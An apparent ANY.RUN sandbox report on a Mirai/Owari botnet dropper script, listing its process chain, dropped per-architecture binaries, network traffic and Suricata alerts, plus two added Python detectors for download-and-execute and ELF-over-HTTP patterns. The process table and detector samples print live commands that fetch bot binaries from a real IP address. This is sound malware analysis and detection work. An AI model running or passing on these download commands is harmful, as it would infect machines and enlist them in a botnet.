File name: telnet.sh
Full analysis: https://app.any.run/tasks/d4740b4a-0c61-458f-b1d9-fe241f4585ee
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: February 27, 2025, 17:45:34
OS: Ubuntu 22.04.2 LTS
Tags:
opendir
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5: CB40827174FBC19FB3485F4F9B9B3C34
SHA1: BF7D6AEE38215393B73A34C461A8B08DF1D66268
SHA256: DBC0366FFA6359D5C0E60FF24EA5B6B12D887E108151F904FF61479B302B17A5
SSDEEP: 24:vosRnSnsohQn0ko4frpnSKfJoYekYedHnhzlBoj+naYLoefznMUdksoNcnEkowkz:v5Ss9dxVSKxrHBXZ9LTzJFJ7XJpXnhV2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 40723)
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 40678)
    • Modifies file or directory owner

      • sudo (PID: 40675)
    • Potential Corporate Privacy Violation

      • curl (PID: 40684)
      • wget (PID: 40767)
      • curl (PID: 40730)
      • wget (PID: 40723)
      • curl (PID: 40768)
      • curl (PID: 40852)
      • wget (PID: 40845)
      • wget (PID: 40883)
      • curl (PID: 40889)
      • wget (PID: 40682)
      • wget (PID: 40961)
      • wget (PID: 40999)
      • wget (PID: 40921)
      • curl (PID: 41003)
      • wget (PID: 41035)
      • curl (PID: 41041)
      • curl (PID: 40927)
      • curl (PID: 40965)
    • Connects to the server without a host name

      • curl (PID: 40730)
      • wget (PID: 40723)
      • curl (PID: 40768)
      • wget (PID: 40845)
      • wget (PID: 40806)
      • curl (PID: 40815)
      • wget (PID: 40921)
      • wget (PID: 40883)
      • curl (PID: 40927)
      • curl (PID: 40889)
      • wget (PID: 40682)
      • curl (PID: 40684)
      • wget (PID: 40767)
      • wget (PID: 40961)
      • curl (PID: 41003)
      • curl (PID: 40965)
      • wget (PID: 40999)
      • wget (PID: 41035)
      • curl (PID: 41041)
      • curl (PID: 40852)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • curl (PID: 40768)
      • curl (PID: 40815)
      • curl (PID: 40852)
      • curl (PID: 40927)
      • curl (PID: 40889)
      • curl (PID: 41003)
      • curl (PID: 40965)
      • curl (PID: 41041)
      • dbus-daemon (PID: 41124)
      • fusermount3 (PID: 41140)
      • fusermount3 (PID: 41167)
      • dbus-daemon (PID: 41109)
      • gjs-console (PID: 41283)
      • gjs-console (PID: 41412)
      • gnome-shell (PID: 41197)
      • dbus-daemon (PID: 41228)
      (Caveat: curl here is the snap-packaged /snap/curl/1754/bin/curl listed in the process table, so its /proc/mounts reads are most plausibly snap confinement set-up rather than anything the script asked for; the dbus-daemon, fusermount3, gjs-console and gnome-shell hits belong to the Ubuntu desktop session that started later in the run, not to the sample.)
    • Connects to unusual port

      • SSH (PID: 40722)
      • SSH (PID: 40760)
      • SSH (PID: 40805)
      • SSH (PID: 40881)
      • SSH (PID: 40844)
      • SSH (PID: 40919)
      • SSH (PID: 40957)
      • SSH (PID: 40995)
      • SSH (PID: 41033)
      • SSH (PID: 41073)
    • Uses wget to download content

      • bash (PID: 40680)
    • Checks DMI information (probably VM detection)

      • pipewire (PID: 41099)
      • udevadm (PID: 41143)
      • pulseaudio (PID: 41101)
      • systemd-hostnamed (PID: 41360)
      • gnome-shell (PID: 41197)
    • Checks the user who created the process

      • systemd (PID: 41092)
      (Caveat: every process under these two signatures is part of the Ubuntu desktop session, not the sample. DMI reads at session start are normal and should not be read as sandbox evasion by telnet.sh.)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .sh | Linux/UNIX shell script (100)
Total processes: 523
Monitored processes: 299
Malicious processes: 6
Suspicious processes: 17

Behavior graph

(The graph is interactive in the full report; only its node labels survived extraction, with "no specs" marking nodes that carry no indicator.) Launch chain as labelled: dash > sudo > chown > chmod > sudo > bash > locale-check > wget > systemctl > curl > snap-seccomp / snap-confine / dumpe2fs / snap-update-ns > cat > chmod > ssh > ssh > ssh > ssh > wget (the node tagged #MIRAI) > ssh (x6). From there the same block repeats roughly once per downloaded architecture: curl > snap-seccomp > snap-confine > snap-confine > bash > chmod > ssh > wget > ssh (x9), with the bare (indicator-carrying) nodes being the curl, wget and one of the ssh processes in each block. Every node after the last block (gdm-session-worker, systemd, pipewire, pulseaudio, dbus-daemon, gnome-shell, gvfsd, tracker, xwayland, gsd-*, ibus-*, fprintd, spice-vdagent and the rest) is the Ubuntu desktop session that started afterwards and is unrelated to the sample.

Process information

The first five entries (PIDs 40674-40678, parent any-guest-agent) are the sandbox launcher taking ownership of the script, marking it executable and starting it as the unprivileged user; the sample's own behaviour starts at bash (PID 40680). PID 40683 is spawned by snapd and is unrelated. Integrity level is reported as UNKNOWN for every entry and is omitted. Only the first ten of the 299 monitored processes are listed on this page.

PID    CMD
       path | parent | user | exit code
40674  /bin/sh -c "sudo chown user /home/user/Desktop/telnet\.sh && chmod +x /home/user/Desktop/telnet\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/telnet\.sh "
       /usr/bin/dash | any-guest-agent | user | 0
40675  sudo chown user /home/user/Desktop/telnet.sh
       /usr/bin/sudo | dash | root | 0
40676  chown user /home/user/Desktop/telnet.sh
       /usr/bin/chown | sudo | root | 0
40677  chmod +x /home/user/Desktop/telnet.sh
       /usr/bin/chmod | dash | user | 0
40678  sudo -iu user /home/user/Desktop/telnet.sh
       /usr/bin/sudo | dash | root | 0
40680  /bin/bash /home/user/Desktop/telnet.sh
       /usr/bin/bash | sudo | user | 0
40681  /usr/bin/locale-check C.UTF-8
       /usr/bin/locale-check | bash | user | 0
40682  wget http://104.248.155.103/Binarys/Owari.x86
       /usr/bin/wget | bash | user | 0
40683  systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
       /usr/bin/systemctl | snapd | root | 0
40684  /snap/curl/1754/bin/curl -O http://104.248.155.103/Binarys/Owari.x86
       /snap/curl/1754/bin/curl | bash | user | 0
Executable files: 0
Suspicious files: 76
Text files: 11
Unknown types: 0

Dropped files

The MD5 and SHA256 columns are empty for every entry in this report. The script fetches one Owari build per architecture into /tmp; the one file not written by wget, /tmp/SSH, is written by cat (PID 40717), which is the name the "SSH" processes flagged above for unusual-port connections run under.

PID    Process  Filename          Type
40682  wget     /tmp/Owari.x86    binary
40717  cat      /tmp/SSH          binary
40723  wget     /tmp/Owari.mips   binary
40767  wget     /tmp/Owari.mpsl   binary
40845  wget     /tmp/Owari.arm5   binary
40883  wget     /tmp/Owari.arm6   binary
40921  wget     /tmp/Owari.arm7   binary
40961  wget     /tmp/Owari.ppc    binary
40999  wget     /tmp/Owari.m68k   binary
41035  wget     /tmp/Owari.sh4    binary
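The process list and the dropped-files table together show the chain a host-based detection should correlate: a shell launches wget/curl against a literal IP, a file under /tmp is made executable, and a process then runs from /tmp under a system-tool name. The following is an added example written for this page, not ANY.RUN code and not the sample itself. It consumes a constructed, simplified event stream (process start and chmod records with made-up field names). PIDs 40680, 40681, 40682, 40684, 40717 and 40722 are taken from the report; the chmod PID, the cat command line, the exe path /tmp/SSH and the benign control events are assumptions.

```python
"""
Host-side detection of the download-and-execute chain shown in this report.

Added example, not ANY.RUN code. Event records use a constructed schema:
  {"type": "exec",  "pid", "ppid", "comm", "exe", "cmdline"}
  {"type": "chmod", "pid", "path", "mode"}
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SHELLS = {"sh", "bash", "dash"}
FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SYSTEM_DIRS = ("/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/", "/usr/local/bin/", "/snap/")
SYSTEM_NAMES = {"ssh", "sshd", "cron", "systemd", "init"}
URL_HOST_RE = re.compile(r"(?:https?|tftp|ftp)://([^/\s:]+)")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    exe: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def bare_ip_hosts(cmdline: str) -> List[str]:
    """URL authorities in a command line that are IP literals rather than names."""
    hosts = []
    for h in URL_HOST_RE.findall(cmdline):
        try:
            ipaddress.ip_address(h)
            hosts.append(h)
        except ValueError:
            pass
    return hosts


def grants_exec(mode: str) -> bool:
    """Symbolic '+x' or an octal mode with any execute bit set."""
    return "x" in mode or (mode.isdigit() and int(mode, 8) & 0o111 != 0)


def analyse(events: List[dict]) -> List[Finding]:
    procs: Dict[int, Proc] = {}
    fetch_shells = set()          # shell PIDs whose child fetched from a bare IP
    findings: List[Finding] = []
    for ev in events:
        if ev["type"] == "exec":
            p = Proc(ev["pid"], ev["ppid"], ev["comm"], ev["exe"], ev["cmdline"])
            procs[p.pid] = p
            parent: Optional[Proc] = procs.get(p.ppid)
            # R1: download tool launched by a shell with a literal-IP URL.
            if p.comm in FETCH_TOOLS and parent and parent.comm in SHELLS:
                for ip in bare_ip_hosts(p.cmdline):
                    fetch_shells.add(parent.pid)
                    findings.append(Finding(p.pid, "fetch-from-bare-ip", f"{p.comm} {ip} via shell {parent.pid}"))
            # R2: execution out of a world-writable directory.
            if p.exe.startswith(WRITABLE_DIRS):
                findings.append(Finding(p.pid, "exec-from-writable-dir", p.exe))
                # R3: the same shell both fetched from a bare IP and ran the result.
                if p.ppid in fetch_shells:
                    findings.append(Finding(p.pid, "download-and-execute-chain", f"shell {p.ppid} fetched then ran {p.exe}"))
            # R4: system-tool name, but the binary lives outside the system directories.
            if p.comm.lower() in SYSTEM_NAMES and not p.exe.startswith(SYSTEM_DIRS):
                findings.append(Finding(p.pid, "system-name-outside-system-dir", f"{p.comm} is {p.exe}"))
        elif ev["type"] == "chmod" and grants_exec(ev["mode"]) and ev["path"].startswith(WRITABLE_DIRS):
            findings.append(Finding(ev["pid"], "chmod-exec-in-writable-dir", ev["path"]))
    return findings


# Constructed events modelled on the process list and dropped-files table above.
EVENTS = [
    {"type": "exec", "pid": 40680, "ppid": 40678, "comm": "bash", "exe": "/usr/bin/bash", "cmdline": "/bin/bash /home/user/Desktop/telnet.sh"},
    {"type": "exec", "pid": 40681, "ppid": 40680, "comm": "locale-check", "exe": "/usr/bin/locale-check", "cmdline": "/usr/bin/locale-check C.UTF-8"},
    {"type": "exec", "pid": 40682, "ppid": 40680, "comm": "wget", "exe": "/usr/bin/wget", "cmdline": "wget http://104.248.155.103/Binarys/Owari.x86"},
    {"type": "exec", "pid": 40684, "ppid": 40680, "comm": "curl", "exe": "/snap/curl/1754/bin/curl", "cmdline": "/snap/curl/1754/bin/curl -O http://104.248.155.103/Binarys/Owari.x86"},
    {"type": "exec", "pid": 40717, "ppid": 40680, "comm": "cat", "exe": "/usr/bin/cat", "cmdline": "cat Owari.x86"},  # cmdline assumed; report only shows it wrote /tmp/SSH
    {"type": "chmod", "pid": 40719, "path": "/tmp/SSH", "mode": "+x"},                                               # PID assumed
    {"type": "exec", "pid": 40722, "ppid": 40680, "comm": "SSH", "exe": "/tmp/SSH", "cmdline": "./SSH"},            # exe path assumed
    # Benign control (constructed): a login shell running the real OpenSSH client and fetching from a host name.
    {"type": "exec", "pid": 41500, "ppid": 1, "comm": "bash", "exe": "/usr/bin/bash", "cmdline": "-bash"},
    {"type": "exec", "pid": 42000, "ppid": 41500, "comm": "ssh", "exe": "/usr/bin/ssh", "cmdline": "ssh admin@10.0.0.5"},
    {"type": "exec", "pid": 42001, "ppid": 41500, "comm": "wget", "exe": "/usr/bin/wget", "cmdline": "wget https://deb.debian.org/debian/dists/bookworm/Release"},
]

if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"{f.pid} {f.rule}: {f.detail}")
```

Rule R3 is the one worth tuning in production: R1 alone fires on legitimate package mirrors addressed by IP, and R2 alone fires on build systems, but a single shell that both fetches from a bare IP and then executes a freshly chmod'ed file in /tmp is the Mirai downloader pattern almost verbatim.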
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 40
TCP/UDP connections: 170
DNS requests: 12
Threats: 51

HTTP requests

Ten of the 40 requests are listed here. The three Owari fetches (PIDs 40684, 40682, 40723) are the only requests addressed to a bare IP and the only ones whose reputation is not whitelisted; everything else is Ubuntu connectivity checking and snapd store traffic. Empty cells are shown as "-".

PID    Process  Method  Code  IP                   URL                                                  CN       Type    Size     Reputation
-      -        GET     204   185.125.190.49:80    http://connectivity-check.ubuntu.com/                unknown  -       -        whitelisted
-      -        GET     -     91.189.91.48:80      http://connectivity-check.ubuntu.com/                unknown  -       -        whitelisted
-      -        GET     -     185.125.190.98:80    http://connectivity-check.ubuntu.com/                unknown  -       -        whitelisted
40684  curl     GET     200   104.248.155.103:80   http://104.248.155.103/Binarys/Owari.x86             unknown  -       -        unknown
40682  wget     GET     200   104.248.155.103:80   http://104.248.155.103/Binarys/Owari.x86             unknown  -       -        unknown
40723  wget     GET     200   104.248.155.103:80   http://104.248.155.103/Binarys/Owari.mips            unknown  -       -        unknown
-      -        POST    200   185.125.188.59:443   https://api.snapcraft.io/v2/snaps/refresh            unknown  binary  45.3 Kb  whitelisted
-      -        POST    200   185.125.188.58:443   https://api.snapcraft.io/v2/snaps/refresh            unknown  binary  45.3 Kb  whitelisted
-      -        POST    200   185.125.188.59:443   https://api.snapcraft.io/api/v1/snaps/auth/nonces    unknown  binary  53 b     whitelisted
-      -        POST    200   185.125.188.58:443   https://api.snapcraft.io/api/v1/snaps/auth/sessions  unknown  binary  587 b    whitelisted

Connections

Ten of the 170 connections are listed here; all of them are Ubuntu, GNOME and snap background traffic plus mDNS from avahi-daemon. The traffic to 104.248.155.103 does not appear in this excerpt and is documented under HTTP requests and Threats. Empty cells are shown as "-".

PID   Process       IP                    Domain                          ASN                      CN   Reputation
484   avahi-daemon  224.0.0.251:5353      -                               -                        -    unknown
-     -             91.189.91.48:80       connectivity-check.ubuntu.com   Canonical Group Limited  US   whitelisted
-     -             185.125.190.98:80     connectivity-check.ubuntu.com   Canonical Group Limited  GB   whitelisted
-     -             185.125.190.49:80     connectivity-check.ubuntu.com   Canonical Group Limited  GB   whitelisted
-     -             37.19.194.81:443      odrs.gnome.org                  Datacamp Limited         DE   whitelisted
-     -             212.102.56.179:443    odrs.gnome.org                  Datacamp Limited         DE   whitelisted
-     -             169.150.255.183:443   odrs.gnome.org                  -                        GB   whitelisted
-     -             185.125.188.59:443    api.snapcraft.io                Canonical Group Limited  GB   whitelisted
-     -             185.125.188.55:443    api.snapcraft.io                Canonical Group Limited  GB   whitelisted
-     -             185.125.188.54:443    api.snapcraft.io                Canonical Group Limited  GB   whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::197
  • 185.125.190.49
  • 91.189.91.48
  • 91.189.91.96
  • 91.189.91.49
  • 91.189.91.98
  • 185.125.190.18
  • 185.125.190.97
  • 185.125.190.98
  • 185.125.190.96
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.48
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 195.181.175.40
  • 169.150.255.180
  • 212.102.56.179
  • 169.150.255.183
  • 195.181.170.19
  • 207.211.211.26
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::42
whitelisted
google.com
  • 142.250.185.238
  • 2a00:1450:4001:813::200e
whitelisted
50.100.168.192.in-addr.arpa (PTR lookup for the private address 192.168.100.50)
unknown

Threats

Ten of the 51 Suricata alerts are listed here, all raised on the first three Owari downloads. The single "Network Trojan" classification is the Mirai .mips signature on PID 40723; the remaining alerts are generic ELF-over-HTTP, x86/MIPS-from-IP-address and curl-to-dotted-quad hunting rules that fire on the delivery pattern rather than on the family.

PID    Process  Class                                  Message
40682  wget     Potentially Bad Traffic                ET INFO x86 File Download Request from IP Address
40682  wget     Potentially Bad Traffic                ET HUNTING Suspicious GET Request for .x86
40682  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
40684  curl     Potentially Bad Traffic                ET INFO x86 File Download Request from IP Address
40684  curl     Potentially Bad Traffic                ET HUNTING curl User-Agent to Dotted Quad
40684  curl     Potentially Bad Traffic                ET HUNTING Suspicious GET Request for .x86
40684  curl     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
40723  wget     A Network Trojan was detected          AV INFO Possible Mirai .mips Executable Download
40723  wget     Potentially Bad Traffic                ET INFO MIPS File Download Request from IP Address
40723  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
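The alerts above encode three network-visible conditions: an ELF body served over plain HTTP, a GET whose path ends in a Mirai build suffix, and a wget/curl user agent talking to a dotted-quad host. The following is an added example written for this page, not ANY.RUN code and not a Suricata rule: it re-implements those conditions over a simplified JSON-lines HTTP log, generalising the suffix check to every architecture in the dropped-files table rather than only .x86 and .mips. The log schema, the user-agent strings and the response bytes are constructed for the example; the hosts, paths and PIDs mirror the HTTP table above.

```python
"""
Network-side detection of the bot-binary downloads recorded in this report.

Added example, not ANY.RUN code. Each log line is a constructed JSON record:
  {"pid", "method", "scheme", "host", "uri", "user_agent", "status", "resp_body_hex"}
"""
import ipaddress
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Build suffixes taken from the dropped-files table of this report.
ARCH_SUFFIXES = ("x86", "mips", "mpsl", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4")
ARCH_RE = re.compile(r"\.(%s)$" % "|".join(ARCH_SUFFIXES))
ELF_MAGIC = b"\x7fELF"
TOOL_UA_RE = re.compile(r"^(curl|wget)/", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    pid: Optional[int]
    url: str
    reason: str


def host_is_bare_ip(host: str) -> bool:
    """True when the authority is an IP literal (v4, or bracketed v6), not a name."""
    try:
        h = host[1:host.index("]")] if host.startswith("[") else host.split(":")[0]
        ipaddress.ip_address(h)
        return True
    except ValueError:
        return False


def inspect(rec: dict) -> List[Alert]:
    """Apply the three checks to one HTTP record; one Alert per condition that fired."""
    url = f"{rec['scheme']}://{rec['host']}{rec['uri']}"
    reasons = []
    # 1. ELF body fetched over plain HTTP: the response starts with \x7fELF.
    body = bytes.fromhex(rec.get("resp_body_hex", ""))
    if rec["scheme"] == "http" and body.startswith(ELF_MAGIC):
        reasons.append("ELF file download over HTTP")
    # 2. Request path ends in a Mirai build suffix (Owari.x86, Owari.mips, ...).
    m = ARCH_RE.search(rec["uri"])
    if rec["method"] == "GET" and m:
        reasons.append(f"GET request for .{m.group(1)} build")
    # 3. wget/curl talking to a literal IP instead of a host name.
    if host_is_bare_ip(rec["host"]) and TOOL_UA_RE.match(rec.get("user_agent", "")):
        reasons.append("download-tool user agent to bare IP host")
    return [Alert(rec.get("pid"), url, r) for r in reasons]


def scan(log_lines: List[str]) -> List[Alert]:
    """Run inspect() over every non-empty JSON line."""
    return [a for line in log_lines if line.strip() for a in inspect(json.loads(line))]


# Constructed log modelled on the HTTP table above; body bytes and user agents are placeholders.
SAMPLE_LOG = """\
{"pid": null, "method": "GET", "scheme": "http", "host": "connectivity-check.ubuntu.com", "uri": "/", "user_agent": "NetworkManager", "status": 204, "resp_body_hex": ""}
{"pid": 40684, "method": "GET", "scheme": "http", "host": "104.248.155.103", "uri": "/Binarys/Owari.x86", "user_agent": "curl/7.81.0", "status": 200, "resp_body_hex": "7f454c4601010100"}
{"pid": 40682, "method": "GET", "scheme": "http", "host": "104.248.155.103", "uri": "/Binarys/Owari.x86", "user_agent": "Wget/1.21.2", "status": 200, "resp_body_hex": "7f454c4601010100"}
{"pid": 40723, "method": "GET", "scheme": "http", "host": "104.248.155.103", "uri": "/Binarys/Owari.mips", "user_agent": "Wget/1.21.2", "status": 200, "resp_body_hex": "7f454c4601020100"}
{"pid": null, "method": "POST", "scheme": "https", "host": "api.snapcraft.io", "uri": "/v2/snaps/refresh", "user_agent": "snapd/2.58", "status": 200, "resp_body_hex": "7b7d"}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"pid={a.pid} {a.reason}: {a.url}")
```

Check 1 is the one to keep even where the other two are noisy: the suffix list goes stale as builders rename their drops and curl-to-IP is common on internal networks, but an ELF body arriving over cleartext HTTP from outside the organisation is almost never legitimate.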
No debug info